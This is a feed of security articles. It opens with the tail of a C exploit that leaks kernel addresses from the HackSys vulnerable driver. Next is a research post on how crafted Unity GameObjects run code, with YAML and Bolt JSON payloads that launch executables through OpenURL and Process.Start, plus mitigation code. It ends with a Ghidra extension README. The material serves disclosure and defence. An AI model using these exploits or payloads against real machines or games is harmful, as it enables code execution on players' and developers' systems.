        0,
        NULL,
        0,
        &bytesReturned,
        NULL
      );
    }

    printf("[+] Allocated objects containing a pointer to HEVD in place of the freed CreateEventA objects!\n");

    // Close the rest of the event objects
    for (int i = 1; i <= 5000; i += 2)
    {
      BOOL tempHandle2 = CloseHandle(
        eventObjects[i]
      );

      eventObjects[i] = NULL;

      // Error handling
      if (!tempHandle2)
      {
        printf("[-] Error! Unable to free the rest of the CreateEventA objects! Error: 0x%lx\n", GetLastError());
        exit(-1);
      }
    }

    // Array to store the buffer (output buffer for DeviceIoControl) and the base address
    unsigned long long outputBuffer[100];
    unsigned long long hevdBase;

    // Everything is now, theoretically, [FREE, UAFOBJ, FREE, UAFOBJ, FREE, UAFOBJ], barring any more randomization from the kLFH
    // Fill some of the holes, but not all, with vulnerable chunks that can read out-of-bounds (we don't want to fill up all the way to avoid reading from a page that isn't mapped)

    for (int i = 0; i < 100; i++)
    {
      // Return buffer
      DWORD bytesReturned1;

      DeviceIoControl(
        driverHandle,
        0x0022204f,
        NULL,
        0,
        &outputBuffer,
        sizeof(outputBuffer),
        &bytesReturned1,
        NULL
      );

    }

    printf("[+] Successfully triggered the out-of-bounds read!\n");

    // Parse the output
    for (int i = 0; i < 100; i++)
    {
      // Kernel mode address?
      if ((outputBuffer[i] & 0xfffff00000000000) == 0xfffff00000000000)
      {
        printf("[+] Address of function pointer in HEVD.sys: 0x%llx\n", outputBuffer[i]);
        printf("[+] Base address of HEVD.sys: 0x%llx\n", outputBuffer[i] - 0x880CC);

        // Store the variable for future usage
        hevdBase = outputBuffer[i] - 0x880CC;
        break;
      }
    }
  }
}

void main(void)
{
  // Open a handle to the driver
  printf("[+] Obtaining handle to HEVD.sys...\n");

  HANDLE drvHandle = CreateFileA(
    "\\\\.\\HackSysExtremeVulnerableDriver",
    GENERIC_READ | GENERIC_WRITE,
    0x0,
    NULL,
    OPEN_EXISTING,
    0x0,
    NULL
  );

  // Error handling
  if (drvHandle == (HANDLE)-1)
  {
    printf("[-] Error! Unable to open a handle to the driver. Error: 0x%lx\n", GetLastError());
    exit(-1);
  }
  else
  {
    memLeak(drvHandle);
  }
}

Conclusion

Kernel exploits from browsers, which are sandboxed, require such leaks to perform successful escalation of privileges. In part two of this series we will combine this bug with HEVD’s pool overflow vulnerability to achieve a read/write primitive and perform successful EoP! Please feel free to reach out with comments, questions, or corrections!

Peace, love, and positivity :-)

☑ ★ ✇ Include Security Research Blog

Hacking Unity Games with Malicious GameObjects

By: Jason Kielpinski

At IncludeSec our clients are asking us to hack on all sorts of crazy applications from mass scale web systems to IoT devices and low-level firmware. Something that we’re seeing more of is hacking virtual reality systems and mass scale video games so we had a chance to do some research and came up with what we believe to be a novel attack against Unity-powered games!

Specifically, this post will outline:

  • Two ways I found that GameObjects (a non-code asset type) can be crafted to cause arbitrary code to run.
  • Five possible ways an attacker might use a malicious GameObject to compromise a Unity game.
  • How game developers can mitigate the risk.

Unity has also published their own blog post on this subject. Be sure to check that out for their specific recommendations and how to protect against this sort of vulnerability.

Terminology

First a brief primer on the terms I’m going to use for those less familiar with Unity.

  • GameObjects are entities in Unity that can have any number of components attached.
  • Components are added to GameObjects to make them do things. They include Unity built-in components, like UI elements and sprite renderers, as well as custom scripted components used to build the game logic.
  • Assets are the elements that make up the game. This includes images, sounds, scripts, and GameObjects, among other things.
  • AssetBundles are a way to package non-code assets and allow them to be loaded at runtime (from the web or locally). They are used to decrease initial download size, allow downloadable content, as well as sometimes to enable modding of the game.

Ways a malicious GameObject could get into a game

Before going into details about how a GameObject could execute code, let’s talk about how it would get in the game in the first place so that we’re clear on the attack scenarios. I came up with five ways a malicious GameObject might find its way into a Unity game:

Way 1: the most obvious route is if the game developer downloaded it and added it to the game project. This might be an asset they purchased on the Unity Asset Store, or something they found on GitHub that solved a problem they were having.

Way 2: Unity AssetBundles allow non-script assets (including GameObjects) to be imported into a game at runtime. There may be an assumption that these assets are safe, since they contain no custom script assets, but as you’ll see further into the post that is not a safe assumption. For example, sometimes AssetBundles are used to add modding functionality to a game. If that’s the case, then third-party mods downloaded by a user can unexpectedly cause code execution, similar to running untrusted programs from the internet.

Way 3: AssetBundles can be downloaded from the internet at runtime without transport encryption enabling man-in-the-middle attacks. The Unity documentation has an example of how to do this, partially listed below:

UnityWebRequest uwr = UnityWebRequestAssetBundle.GetAssetBundle("http://www.my-server.com/mybundle")

In the Unity-provided example, the AssetBundle is being downloaded over HTTP. If an AssetBundle is downloaded over HTTP (which lacks the encryption and certificate validation of HTTPS), an attacker with a man-in-the-middle position of whoever is running the game could tamper with the AssetBundle in transit and replace it with a malicious one. This could, for example, affect players who are playing on an untrusted network such as a public WiFi access point.

Way 4: AssetBundles can be downloaded from the internet at runtime with transport encryption but man-in-the-middle attacks might still be possible.

Unity has this to say about certificate validation when using UnityWebRequests:

Some platforms will validate certificates against a root certificate authority store. Other platforms will simply bypass certificate validation completely.

According to the docs, even if you use HTTPS, on certain platforms Unity won’t check certificates to verify it’s communicating with the intended server, opening the door for possible AssetBundle tampering. It’s possible to create your own certificate handler, but only on specific platforms:

Note: Custom certificate validation is currently only implemented for the following platforms – Android, iOS, tvOS and desktop platforms.

I could not find information about which platforms “bypass certificate validation completely”, but I’m guessing it’s the less-common ones? Still, if you’re developing a game that downloads AssetBundles, you might want to verify that certificate validation is working on the platforms you use.

Way 5: Malicious insider. A contributor on a development team or open source project wants to add some bad code to a game. But maybe the dev team has code reviews to prevent this sort of thing. Likely, those code reviews don’t extend to the GameObjects themselves, so the attacker smuggles their code into a GameObject that gets deployed with the game.

Crafting malicious GameObjects

I think it’s pretty obvious why you wouldn’t want arbitrary code running in your game — it might compromise players’ computers, steal their data, crash the game, etc. If the malicious code runs on a development machine, the attacker could potentially steal the source code or pivot to attack the studio’s internal network. Peter Clemenko had another interesting perspective on his blog: essentially, in an upcoming near-future augmented-reality cyberpunk ready-player-1 world, an attacker may seek to inject things into a user’s reality to confuse, distract, or annoy them, and that might cause real-world harm.

So, how can non-script assets get code execution?

Method 1: UnityEvents

Unity has an event system that allows hooking up delegates in code that will be called when an event is triggered. You can use them in your custom scripts for game-specific events, and they are also used on Unity’s built-in UI components (such as Buttons) for event handlers (like onClick). Additionally, you can add handlers for events such as PointerClick, PointerEnter, Scroll, etc. to a GameObject using an EventTrigger component.

One-parameter UnityEvents can be exposed in the inspector by components. In normal usage, setting up a UnityEvent looks like this in the Unity inspector:

First you have to assign a GameObject to receive the event callback (in this case, “Main Camera”). Then you can look through methods and properties on any components attached to that GameObject, and select a handler method.

Many assets in Unity, including scenes and GameObject prefabs, are serialized as YAML files that store the various properties of the object. Opening up the object containing the above event trigger, the YAML looks like this:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 1978173272}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: 11500000, guid: d0b148fe25e99eb48b9724523833bab1, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  m_Delegates:
  - eventID: 4
    callback:
      m_PersistentCalls:
        m_Calls:
        - m_Target: {fileID: 963194228}
          m_TargetAssemblyTypeName: UnityEngine.Component, UnityEngine
          m_MethodName: SendMessage
          m_Mode: 5
          m_Arguments:
            m_ObjectArgument: {fileID: 0}
            m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
            m_IntArgument: 0
            m_FloatArgument: 0
            m_StringArgument: asdf
            m_BoolArgument: 0
          m_CallState: 2

The most important part is under m_Delegates — that’s what controls which methods are invoked when the event is triggered. I did some digging in the Unity C# source repo along with some experimenting to figure out what some of these properties are. First, to summarize my findings: UnityEvents can call any method that has a return type void and takes zero or one argument of a supported type. This includes private methods, setters, and static methods. Although the UI restricts you to invoking methods available on a specific GameObject, editing the object’s YAML does not have that restriction — they can call any method in a loaded assembly. You can skip to exploitation below if you don’t need more details of how this works.

Technical details

UnityEvents technically support delegate functions with anywhere from zero to four parameters, but unfortunately Unity does not use any UnityEvents with greater than one parameter for its built-in components (and I found no way to encode more parameters into the YAML). We are therefore limited to one-parameter functions for our attack.

The important fields in the above YAML are:

  • eventID — This is specific to EventTriggers (rather than UI components.) It specifies the type of event, PointerClick, PointerHover, etc. PointerClick is “4”.
  • m_TargetAssemblyTypeName — this is the fully qualified .NET type name that the event handler function will be called on. Essentially this takes the form: namespace.typename, assemblyname. It can be anything in one of the assemblies loaded by Unity, including all Unity engine stuff as well as a lot of .NET stuff.
  • m_callstate — Determines when the event triggers — only during a game, or also while using the Unity Editor:
    • 0 – UnityEventCallState.Off
    • 1 – UnityEventCallState.EditorAndRuntime
    • 2 – UnityEventCallState.RuntimeOnly
  • m_mode — Determines the argument type of the called function.
    • 0 – EventDefined
    • 1 – Void,
    • 2 – Object,
    • 3 – Int,
    • 4 – Float,
    • 5 – String,
    • 6 – Bool
  • m_target — Specify the Unity object instance that the method will be called on. Specifying m_target: {fileId: 0} allows static methods to be called.

Unity uses C# reflection to obtain the method to call based on the above. The code ultimately used to obtain the method is shown below:

objectType.GetMethod(functionName, BindingFlags.Public | BindingFlags.NonPublic | BindingFlags.Instance | BindingFlags.Static, null, argumentTypes, null);

With the binding flags provided, it’s possible to specify private or public methods, static or instance methods. When calling the function, a delegate is created with type UnityAction that has a return type of void — therefore, the specified function must have a void return type.

Exploitation

My goal after discovering the above was to find some method available in the default loaded assemblies fitting the correct form (static, return void, exactly 1 parameter) which would let me do Bad Things™. Ideally, I wanted to get arbitrary code execution, but other things could be interesting too. If I could hook up an event handler to something dangerous, we would have a malicious GameObject.

I was quickly able to get arbitrary code execution on Windows machines by invoking Application.OpenURL() with a UNC path pointing to a malicious executable on a network share. The attacker would host a malicious exe file, and wait for the game client to trigger the event. OpenURL will then download and execute the payload. 

Below is the event definition I used  in the object YAML:

- m_Target: {fileID: 0}
  m_TargetAssemblyTypeName: UnityEngine.Application, UnityEngine
  m_MethodName: OpenURL
  m_Mode: 5
  m_Arguments:
    m_ObjectArgument: {fileID: 0}
    m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
    m_IntArgument: 0
    m_FloatArgument: 0
    m_StringArgument: file://JASON-INCLUDESE/shared/calc.exe
    m_BoolArgument: 0
  m_CallState: 2

It sets an OnPointerClick handler on an object with a large bounding box (to ensure it gets triggered). When the victim user clicks, it retrieves calc.exe from a network share and executes it. In a hypothetical attack the exe file would likely be on the internet, but I hosted on my local network. Here’s a gif of what happens when you click the object:

This got arbitrary code execution on Windows from a malicious GameObject either in an AssetBundle or included in the project. However, the network drive method won’t work on non-Windows platforms unless they’ve specifically mounted a share, since they don’t automatically open UNC paths. What about those platforms?

Another interesting function is EditorUtility.OpenWithDefaultApp(). It takes a string path to a file, and opens it up with the system’s default app for this file type. One useful part is that it takes relative paths in the project. An attacker who can get malicious executables into your project can call this function with the relative path to their executable to get them to run.

For example, on macOS I compiled the following C program which writes “hello there” to /tmp/hello:

#include <stdio.h>
int main() {
  FILE* fp = fopen("/tmp/hello", "w");
  fprintf(fp, "hello there");
  fclose(fp);
  return 0;
}

I included the compiled binary in my Assets folder as “hello” (no extension — this is important!) Then I set up the following onClick event on a button:

m_OnClick:
  m_PersistentCalls:
    m_Calls:
    - m_Target: {fileID: 0}
      m_TargetAssemblyTypeName: UnityEditor.EditorUtility, UnityEditor
      m_MethodName: OpenWithDefaultApp
      m_Mode: 5
      m_Arguments:
        m_ObjectArgument: {fileID: 0}
        m_ObjectArgumentAssemblyTypeName: UnityEngine.Object, UnityEngine
        m_IntArgument: 0
        m_FloatArgument: 0
        m_StringArgument: Assets/hello
        m_BoolArgument: 0
      m_CallState: 2

It now executes the executable when you click the button:

This doesn’t work for AssetBundles though, because the unpacked contents of AssetBundles aren’t written to disk. Although the above might be an exploitation path in some scenarios, my main goal was to get code execution from AssetBundles, so I kept looking for methods that might let me do that on Mac (on Windows, it’s possible with OpenURL(), as previously shown). I used the following regex in SublimeText to search over the UnityCsReference repository for any matching functions that a UnityEvent could call: static( extern|) void [A-Za-z\w_]*\((string|int|bool|float) [A-Za-z\w_]*\)

After poring over the 426 discovered methods, I fell short of getting completely arbitrary code exec from AssetBundles on non-Windows platforms — although I still think it’s probably possible. I did find a bunch of other ways such a GameObject could do Bad Things™. This is just a small sampling:

  • Unity.CodeEditor.CodeEditor.SetExternalScriptEditor() – Can change a user’s default code editor to arbitrary values. Setting it to a malicious UNC executable can achieve code execution whenever they trigger Unity to open a code editor, similar to the OpenURL exploitation path.
  • PlayerPrefs.DeleteAll() – Delete all save games and other stored data.
  • UnityEditor.FileUtil.UnityDirectoryDelete() – Invokes Directory.Delete() on the specified directory.
  • UnityEngine.ScreenCapture.CaptureScreenshot() – Takes a screenshot of the game window to a specified file. Will automatically overwrite the specified file. Can be written to UNC paths in Windows.
  • UnityEditor.PlayerSettings.SetAdditionalIl2CppArgs() – Add flags to be passed to the Il2Cpp compiler.
  • UnityEditor.BuildPlayerWindow.BuildPlayerAndRun() – Trigger the game to build. In my testing I couldn’t get this to work, but combined with the Il2Cpp flag function above it could be interesting.
  • Application.Quit(), EditorApplication.Exit() – Quit out of the game/editor.

Method 2: Visual scripting systems

There are various visual scripting systems for Unity that let you create logic without code. If you have imported one of these into your project, any third-party GameObject you import can use the visual scripting system. Some systems are more powerful than others. I will focus on Bolt as an example since it’s pretty popular: Unity acquired it, and it’s now free.

This attack vector was proposed on Peter Clemenko’s blog that I mentioned earlier, but it focused on malicious entity injection. It should be clarified that, using Bolt, it’s possible for imported GameObjects to achieve arbitrary code execution as well, including shell command execution.

With the default settings, Bolt does not show many of the methods available to you in the loaded assemblies in its UI. Once again, though, you have more options if you edit the YAML than you do in the UI. For example, if you make a simple Bolt flow graph like the following:

The YAML looks like:

MonoBehaviour:
  m_ObjectHideFlags: 0
  m_CorrespondingSourceObject: {fileID: 0}
  m_PrefabInstance: {fileID: 0}
  m_PrefabAsset: {fileID: 0}
  m_GameObject: {fileID: 2032548220}
  m_Enabled: 1
  m_EditorHideFlags: 0
  m_Script: {fileID: -57143145, guid: a040fb66244a7f54289914d98ea4ef7d, type: 3}
  m_Name:
  m_EditorClassIdentifier:
  _data:
    _json: '{"nest":{"source":"Embed","macro":null,"embed":{"variables":{"collection":{"$content":[],"$version":"A"},"$version":"A"},"controlInputDefinitions":[],"controlOutputDefinitions":[],"valueInputDefinitions":[],"valueOutputDefinitions":[],"title":null,"summary":null,"pan":{"x":117.0,"y":-103.0},"zoom":1.0,"elements":[{"coroutine":false,"defaultValues":{},"position":{"x":-204.0,"y":-144.0},"guid":"a4dcd43b-833d-49f5-8642-b6c311cf324f","$version":"A","$type":"Bolt.Start","$id":"10"},{"chainable":false,"member":{"name":"OpenURL","parameterTypes":["System.String"],"targetType":"UnityEngine.Application","targetTypeName":"UnityEngine.Application","$version":"A"},"defaultValues":{"%url":{"$content":"https://includesecurity.com","$type":"System.String"}},"position":{"x":-59.0,"y":-145.0},"guid":"395d9bac-f1da-4173-9e4b-b19d156c9a0b","$version":"A","$type":"Bolt.InvokeMember","$id":"12"},{"sourceUnit":{"$ref":"10"},"sourceKey":"trigger","destinationUnit":{"$ref":"12"},"destinationKey":"enter","guid":"d9cae7fd-e05b-48c6-b16d-5f04b0c722a6","$type":"Bolt.ControlConnection"}],"$version":"A"}}}'
    _objectReferences: []

The _json field seems to be where the meat is. Un-minifying it and focusing on the important parts:

[...]
  "member": {
    "name": "OpenURL",
    "parameterTypes": [
        "System.String"
    ],
    "targetType": "UnityEngine.Application",
    "targetTypeName": "UnityEngine.Application",
    "$version": "A"
  },
  "defaultValues": {
    "%url": {
        "$content": "https://includesecurity.com",
        "$type": "System.String"
    }
  },
[...]

It can be changed from here to a version that runs arbitrary shell commands using System.Diagnostics.Process.Start:

[...]
{
  "chainable": false,
  "member": {
    "name": "Start",
    "parameterTypes": [
        "System.String",
        "System.String"
    ],
    "targetType": "System.Diagnostics.Process",
    "targetTypeName": "System.Diagnostics.Process",
    "$version": "A"
  },
  "defaultValues": {
    "%fileName": {
        "$content": "cmd.exe",
        "$type": "System.String"
    },
    "%arguments": {
         "$content": "/c calc.exe",
         "$type": "System.String"
    }
  },
[...]

This is what that looks like now in Unity:

A malicious GameObject imported into a project that uses Bolt can do anything it wants.

How to prevent this

Third-party assets

It’s unavoidable for many dev teams to use third-party assets in their game, be it from the asset store or an outsourced art team. Still, the dev team can spend some time scrutinizing these assets before inclusion in their game — first evaluating the asset creator’s trustworthiness before importing it into their project, then reviewing it (more or less carefully depending on how much you trust the creator). 

AssetBundles

When downloading AssetBundles, make sure they are hosted securely with HTTPS. You should also double check that Unity validates HTTPS certificates on all platforms your game runs on; you can verify this by setting up a server with a self-signed certificate and trying to download an AssetBundle from it over HTTPS. On the Windows editor, where certificate validation is verified as working, doing this produces an error like the following and sets the UnityWebRequest.isNetworkError property to true:

If the download works with no error, then an attacker could insert their own HTTPS server in between the client and server, and inject a malicious AssetBundle. 

If Unity does not validate certificates on your platform and you are not on one of the platforms that allows for custom certificate checking, you probably have to implement your own solution — likely integrating a different HTTP client that does check certificates and/or signing the AssetBundles in some way.

When possible, don’t download AssetBundles from third parties. This is impossible, though, if you rely on AssetBundles for modding functionality. In that case, you might try to sanitize objects you receive. I know that Bolt scripts are dangerous, as well as anything containing a UnityEvent (EventTriggers and various UI elements, for example). The following code strips these dangerous components recursively from a downloaded GameObject asset before instantiating it:

private static void SanitizePrefab(GameObject prefab)
{
    System.Type[] badComponents = new System.Type[] {
        typeof(UnityEngine.EventSystems.EventTrigger),
        typeof(Bolt.FlowMachine),
        typeof(Bolt.StateMachine),
        typeof(UnityEngine.EventSystems.UIBehaviour)
    };

    foreach (var componentType in badComponents) {
        foreach (var component in prefab.GetComponentsInChildren(componentType, true)) {
            DestroyImmediate(component, true);
        }
    }
}

public static Object SafeInstantiate(GameObject prefab)
{
    SanitizePrefab(prefab);
    return Instantiate(prefab);
}

public void Load()
{
    AssetBundle ab = AssetBundle.LoadFromFile(Path.Combine(Application.streamingAssetsPath, "evilassets"));

    GameObject evilGO = ab.LoadAsset<GameObject>("EvilGameObject");
    GameObject evilBolt = ab.LoadAsset<GameObject>("EvilBoltObject");
    GameObject evilUI = ab.LoadAsset<GameObject>("EvilUI");

    SafeInstantiate(evilGO);
    SafeInstantiate(evilBolt);
    SafeInstantiate(evilUI);

    ab.Unload(false);
}

Note that we haven’t done a full audit of Unity and we pretty much expect that there are other tricks with UnityEvents, or other ways for a GameObject to get code execution. But the code above at least protects against all of the attacks outlined in this blog.

If it’s essential to allow any of these things (such as Bolt scripts) to be imported into your game from AssetBundles, it gets trickier. Most likely the developer will want to create a whitelist of methods Bolt is allowed to call, and then attempt to remove any methods not on the whitelist before instantiating dynamically loaded GameObjects containing Bolt scripts. The whitelist could be something like “only allow methods in the MyCompanyName.ModStuff namespace.” Allowing all of the UnityEngine namespace would not be good enough because of things like Application.OpenURL, but you could wrap anything you need in another namespace. Using a blacklist to specifically reject bad methods is not recommended; the surface area is just too large and it’s likely something important will be missed. That said, a combination of whitelist and blacklist may be workable with high confidence.

In general, game developers need to decide how much protection they want to add at the app layer versus leaving the risk decision to the end user’s own judgment about which mods to run, just as it’s on them which executables they download. That’s fair, but it might be a good idea to at least give gamers a heads-up, via documentation and notifications in the UI layer, that mods could be dangerous. They may not expect that mods could harm their computer, and might be more careful once they know.

As mentioned above, if you’d like to read more about Unity’s fix for this and their recommendations, be sure to check out their blog post!

The post Hacking Unity Games with Malicious GameObjects appeared first on Include Security Research Blog.

☑ ★ ✇ KitPloit - PenTest & Hacking Tools

Kaiju - A Binary Analysis Framework Extension For The Ghidra Software Reverse Engineering Suite

By: Zion3R


CERT Kaiju is a collection of binary analysis tools for Ghidra.

This is a Ghidra/Java implementation of some features of the CERT Pharos Binary Analysis Framework, particularly the function hashing and malware analysis tools, but is expected to grow new tools and capabilities over time.

As this is a new effort, this implementation does not yet have full feature parity with the original C++ implementation based on ROSE; however, the move to Java and Ghidra has actually enabled some new features not available in the original framework -- notably, improved handling of non-x86 architectures. Since significant re-architecting of the framework and tools is taking place, and since the move to Java and Ghidra enables different capabilities than the C++ implementation, the decision was made to adopt new branding so that there would be less confusion between implementations when discussing the different tools and capabilities.

Our intention for the near future is to maintain both the original Pharos framework as well as Kaiju, side-by-side, since both can provide unique features and capabilities.

CAVEAT: As a prototype, there are many issues that may come up when evaluating the function hashes created by this plugin. For example, unlike the Pharos implementation, Kaiju's function hashing module will create hashes for very small functions (e.g., ones with a single instruction like RET), causing many more unintended collisions. As such, analytical results may vary between this plugin and Pharos fn2hash.


Quick Installation

Pre-built Kaiju packages are available. Simply download the ZIP file corresponding with your version of Ghidra and install according to the instructions below. It is recommended to install via Ghidra's graphical interface, but it is also possible to manually unzip into the appropriate directory to install.

CERT Kaiju requires the following runtime dependencies:

NOTE: It is also possible to build the extension package on your own and install it. Please see the instructions under the "Build Kaiju Yourself" section below.


Graphical Installation

Start Ghidra, and from the opening window, select from the menu: File > Install Extension. Click the plus sign at the top of the extensions window, navigate and select the .zip file in the file browser and hit OK. The extension will be installed and a checkbox will be marked next to the name of the extension in the window to let you know it is installed and ready.

The interface will ask you to restart Ghidra to start using the extension. Simply restart, and then Kaiju's extra features will be available for use interactively or in scripts.

Some functionality may require enabling Kaiju plugins. To do this, open the Code Browser then navigate to the menu File > Configure. In the window that pops up, click the Configure link below the "CERT Kaiju" category icon. A pop-up will display all available publicly released Kaiju plugins. Check any plugins you wish to activate, then hit OK. You will now have access to interactive plugin features.

If a plugin is not immediately visible once enabled, you can find the plugin underneath the Window menu in the Code Browser.

Experimental "alpha" versions of future tools may be available from the "Experimental" category if you wish to test them. However these plugins are definitely experimental and unsupported and not recommended for production use. We do welcome early feedback though!


Manual Installation

Ghidra extensions like Kaiju may also be installed manually by unzipping the extension contents into the appropriate directory of your Ghidra installation. For more information, please see The Ghidra Installation Guide.


Usage

Kaiju's tools may be used either in an interactive graphical way, or via a "headless" mode more suited for batch jobs. Some tools may only be available for graphical or headless use, by the nature of the tool.


Interactive Graphical Interface

Kaiju creates an interactive graphical interface (GUI) within Ghidra utilizing Java Swing and Ghidra's plugin architecture.

Most of Kaiju's tools are actually Analysis plugins that run automatically when the "Auto Analysis" option is chosen, either upon import of a new executable to disassemble, or by directly choosing Analysis > Auto Analyze... from the code browser window. You will see several CERT Analysis plugins selected by default in the Auto Analyze tool, but you can enable/disable any as desired.

The Analysis tools must be run before the various GUI tools will work, however. In some corner cases, it may even be helpful to run the Auto Analysis twice to ensure all of the metadata is produced to create correct partitioning and disassembly information, which in turn can influence the hashing results.

Analyzers are automatically run during Ghidra's analysis phase and include:

  • DisasmImprovements = improves the function partitioning of the disassembly compared to the standard Ghidra partitioning.
  • Fn2Hash = calculates function hashes for all functions in a program and is used to generate YARA signatures for programs.

The GUI tools include:

  • Function Hash Viewer = a plugin that displays an interactive list of functions in a program and several types of hashes. Analysts can use this to export one or more functions from a program into YARA signatures.
    • Select Window > CERT Function Hash Viewer from the menu to get started with this tool if it is not already visible. A new window will appear displaying a table of hashes and other data. Buttons along the top of the window can refresh the table or export data to file or a YARA signature. This window may also be docked into the main Ghidra CodeBrowser for easier use alongside other plugins. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.
  • OOAnalyzer JSON Importer = a plugin that can load, parse, and apply Pharos-generated OOAnalyzer results to object oriented C++ executables in a Ghidra project. When launched, the plugin will prompt the user for the JSON output file produced by OOAnalyzer that contains information about recovered C++ classes. After loading the JSON file, recovered C++ data types and symbols found by OOAnalyzer are updated in the Ghidra Code Browser. The plugin's design and implementation details are described in our SEI blog post titled Using OOAnalyzer to Reverse Engineer Object Oriented Code with Ghidra.
    • Select CERT > OOAnalyzer Importer from the menu to get started with this tool. A simple dialog popup will ask you to locate the JSON file you wish to import. More extensive usage documentation can be found in Ghidra's Help > Contents menu when using the tool.

Command-line "Headless" Mode

Ghidra also supports a "headless" mode allowing tools to be run in some circumstances without use of the interactive GUI. These commands can therefore be utilized for scripting and "batch mode" jobs of large numbers of files.

The headless tools largely rely on Ghidra's GhidraScript functionality.

Headless tools include:

  • fn2hash = automatically run Fn2Hash on a given program and export all the hashes to a CSV file specified
  • fn2yara = automatically run Fn2Hash on a given program and export all hash data as YARA signatures to the file specified
  • fnxrefs = analyze a Program and export a list of Functions based on entry point address that have cross-references in data or other parts of the Program

A simple shell launch script named kaijuRun has been included to run these headless commands for simple scenarios, such as outputting the function hashes for every function in a single executable. Assuming the GHIDRA_INSTALL_DIR variable is set, one might for example run the launch script on a single executable as follows:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun fn2hash example.exe

This command would output the results to an automatically named file as example.exe.Hashes.csv.

Basic help for the kaijuRun script is available by running:

$GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju/kaijuRun --help

Please see docs/HeadlessKaiju.md file in the repository for more information on using this mode and the kaijuRun launcher script.


Further Documentation and Help

More comprehensive documentation and help is available, in one of two formats.

See the docs/ directory for Markdown-formatted documentation and help for all Kaiju tools and components. These documents are easy to maintain and edit and read even from a command line.

Alternatively, you may find the same documentation in Ghidra's built-in help system. To access these help docs, from the Ghidra menu, go to Help > Contents and then select CERT Kaiju from the tree navigation on the left-hand side of the help window.

Please note that the Ghidra Help documentation is the exact same content as the Markdown files in the docs/ directory; thanks to an in-tree gradle plugin, gradle will automatically parse the Markdown and export into Ghidra HTML during the build process. This allows even simpler maintenance (update docs in just one place, not two) and keeps the two in sync.

All new documentation should be added to the docs/ directory.


Building Kaiju Yourself Using Gradle

Alternately to the pre-built packages, you may compile and build Kaiju yourself.


Build Dependencies

CERT Kaiju requires the following build dependencies:

  • Ghidra 9.1+ (9.2+ recommended)
  • gradle 6.4+ (latest gradle 6.x recommended, 7.x not supported)
  • GSON 2.8.6
  • Java 11+ (we recommend OpenJDK 11)

NOTE ABOUT GRADLE: Please ensure that gradle is building against the same JDK version in use by Ghidra on your system, or you may experience installation problems.

NOTE ABOUT GSON: In most cases, Gradle will automatically obtain this for you. If you find that you need to obtain it manually, you can download gson-2.8.6.jar and place it in the kaiju/lib directory.


Build Instructions

Once dependencies are installed, Kaiju may be built as a Ghidra extension by using the gradle build tool. It is recommended to first set a Ghidra environment variable, as Ghidra installation instructions specify.

In short: set GHIDRA_INSTALL_DIR as an environment variable first, then run gradle without any options:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle

NOTE: Your Ghidra install directory is the directory containing the ghidraRun script (the top level directory after unzipping the Ghidra release distribution into the location of your choice.)

If for some reason your environment variable is not or cannot be set, you can also specify it on the command line with:

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>

In either case, the newly-built Kaiju extension will appear as a .zip file within the dist/ directory. The filename will include "Kaiju", the version of Ghidra it was built against, and the date it was built. If all goes well, you should see a message like the following that tells you the name of your built plugin.

Created ghidra_X.Y.Z_PUBLIC_YYYYMMDD_kaiju.zip in <path/to>/kaiju/dist

where X.Y.Z is the version of Ghidra you are using, and YYYYMMDD is the date you built this Kaiju extension.


Optional: Running Tests With AUTOCATS

While not required, you may want to use the Kaiju testing suite to verify proper compilation and ensure there are no regressions while testing new code or before you install Kaiju in a production environment.

In order to run the Kaiju testing suite, you will need to first obtain the AUTOCATS (AUTOmated Code Analysis Testing Suite). AUTOCATS contains a number of executables and related data to perform tests and check for regressions in Kaiju. These test cases are shared with the Pharos binary analysis framework, therefore AUTOCATS is located in a separate git repository.

Clone the AUTOCATS repository with:

git clone https://github.com/cmu-sei/autocats

We recommend cloning the AUTOCATS repository into the same parent directory that holds Kaiju, but you may clone it anywhere you wish.

The tests can then be run with:

gradle -PKAIJU_AUTOCATS_DIR=path/to/autocats/dir test

where of course the correct path is provided to your cloned AUTOCATS repository directory. If cloned to the same parent directory as Kaiju as recommended, the command would look like:

gradle -PKAIJU_AUTOCATS_DIR=../autocats test

The tests cannot be run without providing this path; if you do forget it, gradle will abort and give an error message about providing this path.

Kaiju has a dependency on JUnit 5 only for running tests. Gradle should automatically retrieve and use JUnit, but you may also download JUnit and manually place into lib/ directory of Kaiju if needed.

You will want to update your AUTOCATS clone whenever you pull the latest Kaiju source code, to ensure the two stay in sync.


First-Time "Headless" Gradle-based Installation

If you compiled and built your own Kaiju extension, you may alternately install the extension directly on the command line via use of gradle. Be sure to set GHIDRA_INSTALL_DIR as an environment variable first (if you built Kaiju too, then you should already have this defined), then run gradle as follows:

export GHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir>
gradle install

or if you are unsure if the environment variable is set,

gradle -PGHIDRA_INSTALL_DIR=<Absolute path to Ghidra install dir> install

Extension files should be copied automatically. Kaiju will be available for use after Ghidra is restarted.

NOTE: Be sure that Ghidra is NOT running before using gradle to install. We are aware of instances when the caching does not appear to update properly if installed while Ghidra is running, leading to some odd bugs. If this happens to you, simply exit Ghidra and try reinstalling again.


Consider Removing Your Old Installation First

It might be helpful to first completely remove any older install of Kaiju before updating to a newer release. We've seen some cases where older versions of Kaiju files get stuck in the cache and cause interesting bugs due to the conflicts. By removing the old install first, you'll ensure a clean re-install and easy use.

The gradle build process can now auto-remove previous installs of Kaiju if you enable this feature. To enable the autoremove, add the "KAIJU_AUTO_REMOVE" property to your install command, such as the following (assuming the GHIDRA_INSTALL_DIR environment variable is set as in the previous section):

gradle -PKAIJU_AUTO_REMOVE install

If you'd prefer to remove your old installation manually, perform a command like:

rm -rf $GHIDRA_INSTALL_DIR/Extensions/Ghidra/*kaiju*.zip $GHIDRA_INSTALL_DIR/Ghidra/Extensions/kaiju


☑ ★ ✇ KitPloit - PenTest & Hacking Tools

HookDump - Security Product Hook Detection

By: Zion3R


